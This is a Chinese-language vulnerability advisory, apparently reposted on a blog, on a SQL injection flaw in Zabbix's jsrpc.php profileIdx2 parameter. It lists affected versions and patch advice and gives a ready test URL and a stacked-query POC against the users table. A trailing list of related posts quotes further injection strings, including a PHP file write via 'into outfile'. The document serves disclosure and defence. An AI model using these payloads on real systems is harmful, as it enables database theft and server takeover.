Zabbix jsrpc.php profileIdx2参数SQL注入漏洞

Letitgo 2016-08-20

Zabbix jsrpc.php profileIdx2参数SQL注入漏洞


发布日期:2016-08-17
更新日期:2016-08-19

受影响系统:

ZABBIX ZABBIX 3.0.0-3.0.3
ZABBIX ZABBIX 2.5.0
ZABBIX ZABBIX 2.4.8
ZABBIX ZABBIX 2.4.7
ZABBIX ZABBIX 2.4.5
ZABBIX ZABBIX 2.4.2
ZABBIX ZABBIX 2.2.x
ZABBIX ZABBIX 2.0.5
ZABBIX ZABBIX 2.0.13

不受影响系统:

ZABBIX ZABBIX 3.2.0
ZABBIX ZABBIX 3.0.4
ZABBIX ZABBIX 2.2.14
ZABBIX ZABBIX 1.8.*

描述:

Zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级开源解决方案,可以灵活部署在几乎所有流行的操作系统中。

Zabbix软件的jsrpc.php文件在处理profileIdx2参数时存在insert方式的SQL注入漏洞,由于zabbix 默认开启了guest权限,攻击者可使用guest账户或者已经认证的账户登录,利用此漏洞直接获取服务器的操作系统权限。

<*来源:1n3
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

漏洞测试
在您的zabbix的地址后面加上如下URL:
/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get&timestamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=2'3297&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
输出结果,页面中出现如下内容(包含:You have an error in your SQL syntax;)表示漏洞存在:

POC
latest.php?output=ajax&sid=&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
Result:
SQL (0.000361): INSERT INTO profiles (profileid, userid, idx, value_int, type, idx2) VALUES (88, 1, 'web.latest.toggle', '1', 2, 15385); select * from users where (1=1)
latest.php:746 → require_once() → CProfile::flush() → CProfile::insertDB() → DBexecute() in /home/sasha/zabbix-svn/branches/2.2/frontends/php/include/profiles.inc.php:185

建议:

厂商补丁:

ZABBIX
------
1、对于受影响的版本,建议升级到最新版本,获取地址:http://www.zabbix.com/download.php
2、禁用访客账户,例如Windows下的guest账户
3、绿盟科技免费在线检测:
https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?pid=0&sid=1
4、绿盟科技在线云检测,登陆绿盟科技云,申请极光自助扫描服务试用:
https://cloud.nsfocus.com/#/krosa/views/initcdr/productandservice?pid=0&sid=0
5、使用绿盟科技的远程评估系统(RSAS/WVSS)对内网进行安全评估,RSAS插件升级包获取地址:http://update.nsfocus.com/update/listRsasDetail/v/vulweb,WVSS插件升级包获取地址:http://update.nsfocus.com/update/listWvssDetail/v/6/t/plg
6、使用绿盟科技检测类产品(IDS)进行检测,各版本对应升级包分别为5.6.10.14273、5.6.9.14273、5.6.8.594、5.6.7.594、5.6.0.500
7、使用绿盟科技防护类产品(IPS/NF/SG)进行防护,各版本对应升级包分别为5.6.10.14273、5.6.9.14273、5.6.8.594、5.6.7.594、5.6.0.500
8、已经购买了绿盟科技相关服务的客户可与售后联系,进行检测与防护
9、短期服务:绿盟科技工程师现场处理。确保第一时间消除网络内相关风险点,控制事件影响范围,并提供事件分析报告
10、中期服务:提供 3-6个月的风险监控与巡检服务。根除风险,确保事件不复发
11、长期服务:基金行业业务风险解决方案(威胁情报+攻击溯源+专业安全服务)
官方公告页面:https://support.zabbix.com/browse/ZBX-11023
漏洞报告详情:http://seclists.org/fulldisclosure/2016/Aug/82

Letitgo

Letitgo

相关推荐

sql注入 --显错注入

jiong / 0评论 2020-09-17

防止SQL注入的一些解决方法

-----解决方案--------------------------------------------------------过滤URL中的一些特殊字符,动态SQL语句使用PrepareStatement..------解决方案------------

ALiDan / 0评论 2020-07-27

Dapper 封装02-组装SQL

在 SQLSERVER 里,我们在执行命令的时候我们是可以进行参数化传递的。这个好处主要可以防止注入。我们正常写一个 Where 语句,比如WHERE Age=23 and name like ‘%delaywu%‘。从这句话中我们知道一个where 表达

qshpeng / 0评论 2020-07-26

SQL注入相关知识整理

哪里存在SQL注入?任何客户端可控,传递到服务器的变量,并且和数据库进行交互,都有可能存在sql注入。文件名必须全路径,SELECT ‘<?php phpinfo(); ?>’ into outfile ‘c:\Windows\tmp\1.ph

世樹 / 0评论 2020-07-17

面试准备季——MyBatis 面试专题(含答案)

写在前面:2020年面试必备的Java后端进阶面试题总结了一份复习指南在Github上,内容详细,图文并茂,有需要学习的朋友可以Star一下!程序员直接编写原生态 sql,可以严格控制 sql 执行性能,灵活度高。MyBatis 可以使用 XML 或注解来

chenjiazhu / 0评论 2020-07-08

web安全pikachu靶场之SQL注入

数据库注入漏洞,主要是开发人员在构建代码时, 没有对输入边界进行安全考虑,导致攻击者可以通过合法的输入点提交一些精心构造的语句,从而欺骗后台数据库对其进行执行,导致数据库信息泄漏的一-种漏洞。在owasp发布的top10排行榜里,注入漏洞一直是危害排名第一

一对儿程序猿 / 0评论 2020-07-04

Django JSONField/HstoreField SQL注入(CVE-2019-14234)

在IDEA中创建个Django项目,打开已安装的包,发现Django版本已经是2.4,没有该漏洞了,于是修改一下,这里因为python2 是不支持Django,2.x版本的,所以这里用的python3,其实IDEA中venv很好配置。alter user

明月清风精进不止 / 0评论 2020-06-13

第三天--注入攻击:Web安全之SQL注入漏洞专题

第三天--注入攻击:Web安全之SQL注入漏洞专题。SQL手工注入上节课就讲过了,简单复习下。使用union联合查询数据库,数据表,字段以及字段信息。Sqlmap.py –u URL –p 具体参数。结合Burpsuite读取日志文件。Burp提取HTTP

godfather / 0评论 2020-06-13

StringEscapeUtils的常用使用,防止SQL注入及XSS注入

StringBuffer sql = new StringBuffer("select key_sn,remark,create_date from tb_selogon_key where 1=1 "); if(!

ItBJLan / 0评论 2020-06-11

MyBatis中的$和#,用不好,准备走人!

2、${ }是字符串替换, MyBatis在处理${ }时,它会将sql中的${ }替换为变量的值,传入的数据不会加两边加上单引号。

tanrong / 0评论 2020-06-11

dedecms cookies泄漏导致SQL漏洞 article_add.php 的解决方法

漏洞描述:dedecms的文章发表表单中泄漏了用于防御CSRF的核心cookie,同时在其他核心支付系统也使用了同样的cookie进行验证,黑客可利用泄漏的cookie通过后台验证,进行后台注入。

ALiDan / 0评论 2020-06-11

一个sql盲注小工具 (Golang版)

并发,二分法判断。源码写的有点垃圾,有点乱,结果也存在一些缺失。思路大概就是先判断长度,根据长度来开启多少个协程。对于循环导包的问题,直接copy了一份,重命名了一个包。数据存在丢失,而且有些会超时,主要为了练手。

码墨 / 0评论 2020-06-09

JavaWeb - JDBC、各个类详解、工具类、解决sql注入

各个数据库厂商去实现这套这套接口,提供数据库驱动jar包。     我们可以使用这套接口编程,真正执行的代码是驱动jar包中的实现类。    1.复制mysql-connector-java-5.1.37-bin.jar到项目的libs目录下。Strin

世樹 / 0评论 2020-06-05

一次sql server实战

单引号,很明显的错误,因为是时间格式:2020-6-2,所以这里肯定是字符型的。这里出现了关键性的第一个错误:‘CAST‘ 附近有语法错误,需要 ‘AS‘。但是ANDCAST( 这样,去掉中间的空格,语法都错误了。多熟悉几个sql模板语句,在注入的时候,猜

lt云飞扬gt / 0评论 2020-06-03

CVE-2018-8045 Joomla内核SQL注入漏洞

Joomla是一套全球知名的内容管理系统,使用PHP语言、MySQL数据库所开发,适用于Linux、 Windows、MacOSX等各种平台。Joomla的运行环境是PHP+MYSQL+Apache,而phpStudy则集成了这三种程序,只要安装了phpS

godfather / 0评论 2020-06-03

【复习】SQL注入和JS注入

测试过程中的输入框的测试涉及到的SQL注入和JS注入,这里简单记录一下。

xuanlvhaoshao / 0评论 2020-05-14

企业检测SQL注入的一些方式探讨

在企业中有如下几种方式可以选择;最开始使用的是Seay源代码审计工具,后面使用的是Rips代码审计工具,发现都不能满足自己的需求,因为有个致命缺陷,就是会有遗漏的SQL注入找不全。Taint这种参数污染标记跟踪的工具又会比Rips的准确率高。Taint总会

qshpeng / 0评论 2020-05-11

SQL注入漏洞测试(登录绕过)

SELECT * FROM accounts WHERE username=‘admin‘ and password = ‘password‘。  后端如果没做校验处理,username 和 password 值从前端传进来直接执行sql语句,就存在可以构

明月清风精进不止 / 0评论 2020-05-07

SQL注入bypass学习

练习sql注入过程中经常会遇到一些WAF的拦截,在网上找相关文章进行学习,并通过利用安全狗来练习Mysql环境下的bypass。在跟服务器交互的过程中,http允许 get 或者post多次传同一参数值,造成覆盖达到一些绕过waf的效果。在php/apac

gwn00 / 0评论 2020-05-07

sqli-labs-master 第二关+第三关+第四关

id=0") UNION SELECT 1,username, password from users limit 5,1 %23

sixyearsorless / 0评论 2020-05-07

SQL注入实战之盲注篇(布尔、时间盲注)

首先还是写一下核心的语句吧。在SQL注入过程中,应用车鞥徐仅仅返回True(页面)或者False(页面)。无法根据应用程序的返回页面得到需要的数据库信息。在SQL注入过程中,无论注入是否成功,页面完全没有变化。- id =1‘ and ascii(sub

一对儿程序猿 / 0评论 2020-05-06

简述sql注入漏洞

在写与数据库交互的语句时,直接将用户输入的数据跟sql语句进行拼接,没有过滤内容,导致用户可以修改整条语句的结构,产生不同的数据库操作语句,没有经过任何的过滤就直接放入数据库引擎执行。sql注入的危害,一直排行在owasp排行榜的top10高居不下,其危害

liuyang000 / 0评论 2020-04-20

SQL注入攻击与防范

  SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来欺骗数据库服务器执行非授权的任意查询,从而进一步获取相应的数据信

一对儿程序猿 / 0评论 2020-04-20

Thinkphp 5.1.7 SQL注入漏洞

依旧是和上篇文章审计思路一致,越来越觉得代审积累经验很重要了。。还好自己没有头铁学了学php漏洞就头铁去审,哪怕仅仅是这几篇文章这几篇文章学会了debug,学会了看Github的commit记录进行漏洞定位。代审真香啊,越审越好玩。方法中由于程序没有对数据

ItBJLan / 0评论 2020-04-19

常见web安全问题,SQL注入、XSS、CSRF,基本原理以及如何防御

而以分号字元为不同命 令的区别。等 的条件式)2).SQL命令对于传入的字符串参数是用单引号字元所包起来。3).SQL命令中,可以注入注解预防:1).在设计应用程序时,完全使用参数化查询来设计数据 访问功能。4).其他,使用其他更安全的方式连接SQL数据

sunlizhen / 0评论 2020-04-10

SQL注入中information_schema的作用

information_schema数据库是MySQL自带的,MySQL 5以下没有这个数据库,它提供了访问数据库元数据的方式.什么是元数据呢?元数据是关于数据的数据,如数据库名或表名,列的数据类型,或访问权限等.也就是说information_schem

bluetears / 0评论 2020-04-09

CTF-攻防世界-supersqli(sql注入)

继续跑表名,没跑出来,尝试了下执行sql,也木有任何返回。。。看了一下当前用户是root,但不是dba,难道是木有权限。。。再回到页面试了下,发现有过滤关键字,这应该就是工具没跑出表来的原因。把绕过的方法挨个试了一遍,发现可以堆叠注入,查出两个表名来,但是

liuyang000 / 0评论 2020-04-07

php连接mysql的三种方式和预处理下的sql注入

学习了一下堆叠注入和这三种连接方式预处理下的SQL注入问题。  1. 词法和语义解析;  2. 优化 SQL 语句,制定执行计划;  3. 执行并返回结果;PHP的MySQL扩展是设计开发允许php应用与MySQL数据库交互的早期扩展。由于太古老,又不安全

dayi / 0评论 2020-03-28

【转】SQL 注入攻击

select * from [表名] where id = ‘1‘;1审查元素,并利用 f5 刷新页面。id=1 后加入一个 单引号,构成。id=1 and 1=11这相当于 SQL 查询语句:。select select * from 表名 where

wkwanglei / 0评论 2020-03-27

phpyun人才管理系统V5.0 SQL注入漏洞分析

PHP云人才管理系统是国内主流人才管理CMS系统之一!PHP云专为中文用户设计和开发,采用:B/S+c/s技术框架,程序源代码100%完全开放!基于PHP 和 MySQL 数据库构建的为核心开发。Phpyun最新版本V5.0中,在用户邮箱认证处,存在SQL

qshpeng / 0评论 2020-03-26

[ctfhub]SQL注入

今天在ctfhub整理了几个sql注入的解题过程,还算是比较详细的。还有此处的题是ctfhub整合好的,所以所有的数据库和表包括字段名都一样,不要偷懒。select * from news where id=4 union select 3,group_c

lightlanguage / 0评论 2020-03-24

防止SQL注入和XSS注入的方法总结

对用户的输入进行校验,可以通过正则表达式,或限制长度;对单引号和 双"-"进行转换等。采用MDCSOFT-IPS可以有效的防御SQL注入,XSS攻击等。一旦出现SQL注入,一切都是零!谁的代码不按要求进行开发防注入,就处罚谁,而且要狠狠

sswqycbailong / 0评论 2020-03-07

Natas30 Writeup(sql注入)

本关是一个登录页面,查看源码,可以发现关键代码。my $query="Select * FROM users where username =".$dbh->quote . " and password =".

明月清风精进不止 / 0评论 2020-03-06

StringEscapeUtils的常用使用,防止SQL注入及XSS注入

StringEscapeUtils类可以对html js xml sql等代码进行转义来防止SQL注入及XSS注入。select * from users where 1=1 and username like ‘%aaa‘‘ or ‘‘1=1‘。sele

qshpeng / 0评论 2020-03-06

ThinkPHP 3.1.3及之前的版本存在一个SQL注入漏洞

$parse=array_map;//此行为新增代码

gwn00 / 0评论 2020-03-05

聊一聊MyBatis 和 SQL 注入间的恩恩怨怨

面试总被问分库分表怎么办?通过 MyBatis 减少了手写 SQL 语句的痛苦,使用者可以灵活使用 SQL 语句,支持高级映射。使用了 MyBatis 就不会有 SQL 注入了吗?MyBatis它只是一种持久层框架,它并不会为你解决安全问题。本文就将 My

lt云飞扬gt / 0评论 2020-03-04

SemCms2.7 后台 SEMCMS_InquiryView.php SQL 注入

SemCms 是一套开源外贸企业网站管理系统,主要用于外贸企业,兼容 IE、 Firefox 等主流浏览器。SemCms 使用 php 和 vb 语言编写,结合 apache 或 iis 运行。允许攻击者利用 漏洞直接操作网站数据库。* To change

liuyang000 / 0评论 2020-03-03

eml 企业通讯录管理系统 v5.0 SQL 注入

EML 企业客户关系管理系统,是基于 Linux 开放性内核和 Apache 基础上 Php+Mysql 的智能 B/S 交互式服务系统。eml 企业通讯录管理系统 v5.0 登录页面 username 参数 过滤不严导致 sql 注 入。$sql = &

xuanlvhaoshao / 0评论 2020-03-01

Axublog 1.1.0 c_login.php存在sql注入漏洞

Axublog是一款PHP个人博客系统。Axublog存在SQL注入漏洞。攻击者可利用漏洞, 直接进行注入,获取数据库敏感信息。继续跟踪登录验证函数, jsloginpost 。jsloginpost 方法定义在文件 www/ad/c_login.php

gwn00 / 0评论 2020-03-01

sql注入

3.输入:‘ or 1=1 --yangge ‘ 其中--后表示数据库的注释,--后的内容都不进入正式查询语句

ItBJLan / 0评论 2020-02-26

Pikahu-SQL注入模块和sqlmap经典用法

sql注入漏洞 危害是最大得。sql注入类型: 数字型 user_id=$id.        搜索型 text like ‘%{$_GET[‘search‘]}‘ ". select 字段1 from table where id=1 会显示表

xuanlvhaoshao / 0评论 2020-02-21

不同场景/框架下,如何干掉恶心的 SQL 注入?

占位符 ) 和 PreparedStatement,如。还有一些情况,比如 order by、column name,不能使用参数绑定,此时需要手工过滤,如通常 order by 的字段名是有限的,因此可以使用白名单的方式来限制参数值。这里需要注意的是

seteor / 0评论 2020-02-20

Sql注入之oracle

oracle是由甲骨文公司开发的大型数据库,一般应用于电商,铁路,银行等企业,界面回显出数据库版本,如果没有回显出,则可以继续寻常找非数字列,利用非数字列来爆我们所需信息。select table_name from user_tables where r

snowguy / 0评论 2020-02-18

Pikachu靶场SQL注入刷题记录

通过order by判断字段数,order by 2 和order by 3 返回结果不同,可得字段数为2. 可以看到Cookie中含有ant[uname]=admin,怀疑此处可能存在与数据库交互,因此加单引号进行验证

明月清风精进不止 / 0评论 2020-02-17

13 pymysql模块的 基本使用/ sql 注入的问题/增删改查

sql=‘select * from userinfo where user= "%s" and pwd="%s"‘%print

ALiDan / 0评论 2020-02-16

JDBC使用过程

  因为之前的方式会导致驱动注册两次。  PreparedStatement prepareStatement:预编译SQL语句,解决SQL注入的漏洞。  setAutoCommit:设置事务是否自动提交。    boolean execute:执行SQL

gwn00 / 0评论 2020-02-16

登陆页面Sql注入(绕过)

到这里我就基本上没辙了,不过查询了资料以后发现sqlmap可以对登录页面进行注入。“sqlmap的爬虫会爬取自定义的深度以及寻找form表单并自动填充缺失的数据加入扫描”,换句话说sqlmap可以对登陆页面进行注入,并且它会自动寻找注入框来填充数据测试sq

tanrong / 0评论 2020-02-15

攻防世界web进阶区(2)--记一次sql注入

试试1‘ order by 3#,发现页面显示正常,将3换为4时,页面报错,则说明含有3个字段。接下来判断输出点,即输入1‘ union select 1,2,3#,发现2与3的位置是输出点。

bluet00 / 0评论 2020-02-14

php如何防止SQL注入

通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。在用户名输入框中输入:‘ or 1=1#,密码随便输入,这时候的合成后的SQL查询语句为#在mysql中是注释符,这样井号后面的内容将被mysql

gwn00 / 0评论 2020-02-14

DVWA靶机-sql自动注入

打开sql漏洞,发现输入不同的数字会返回不同的信息,前面一个单引号闭合了查询语句自带的第一个单引号,or 1=1 使得结果永远为真,sqlmap需要python环境才能运行。这里先别急着粘贴url,因为登陆dvwa靶机需要用户名和密码,所以会有cookie

gwn00 / 0评论 2020-02-01